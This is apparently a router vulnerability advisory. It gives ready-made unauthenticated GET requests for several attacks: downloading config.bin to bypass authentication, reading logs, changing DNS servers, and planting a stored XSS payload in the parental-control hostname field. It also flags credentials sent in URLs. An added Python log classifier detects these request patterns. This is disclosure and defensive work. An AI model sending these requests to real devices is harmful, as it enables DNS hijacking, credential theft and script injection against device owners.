* Access to the Config file without authentication => full authentication bypass possible! :) (1)
192.168.178.111/config.bin
=======
=======
=> sysPassword is Base64 encoded
* Access to the logfile without authentication: (1)
192.168.178.111/status/status_log.sys
* Change the DNS Settings without authentication: (1)
http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2
* Stored XSS within parental control (2):
=> Parameter: set/bwlist/entry:1/hostname
Request:
http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1
Again you are able to place this XSS without authentication. :)
* Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3)
http://192.168.178.111/login.xgi?user=admin&pass=admin1
* Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3)
http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1
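
Every request listed above is a plain GET, so each one leaves a recognisable line in the log of any proxy or gateway sitting in front of the device's web interface. The following classifier is an added example, not part of the original advisory: it flags those request shapes in constructed Common Log Format lines. The log format, the sample lines and the finding labels are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths and parameter names below come from the request lines in the advisory.
SENSITIVE_PATHS = {"/config.bin", "/status/status_log.sys"}
CRED_PARAMS = {"pass", "oldpwd", "password"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return the sorted findings for one access-log line (empty list if clean)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = set()
    if url.path in SENSITIVE_PATHS:
        findings.add("sensitive-file-fetch")
    if url.path.endswith(".xgi"):
        for pair in url.query.split("&"):
            key, _, value = pair.partition("=")
            key_l = key.lower()
            if key_l.startswith("set/"):  # SET/... and set/... both write settings
                findings.add("state-change-via-get")
            if key_l.rsplit("/", 1)[-1] in CRED_PARAMS:
                findings.add("credential-in-url")
            if re.search(r"[<>\"']", unquote(value)):
                findings.add("markup-in-parameter")
    return sorted(findings)

SAMPLE_LOG = [  # constructed log lines (assumed Common Log Format)
    '192.168.178.20 - - [01/Jan/2024:10:00:00 +0000] "GET /config.bin HTTP/1.1" 200 4096',
    '192.168.178.20 - - [01/Jan/2024:10:00:05 +0000] "GET /advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1 HTTP/1.1" 200 512',
    '192.168.178.21 - - [01/Jan/2024:10:01:00 +0000] "GET /login.xgi?user=admin&pass=admin1 HTTP/1.1" 200 310',
    '192.168.178.20 - - [01/Jan/2024:10:02:00 +0000] "GET /home/home_parent.xgi?&set/bwlist/entry:1/hostname=%22%3E%3Cb%3E&set/bwlist/apply=1 HTTP/1.1" 200 120',
    '192.168.178.21 - - [01/Jan/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line.split('"')[1])
```

A "credential-in-url" hit also means the password is already stored in that log, so the log file needs the same protection as the credential.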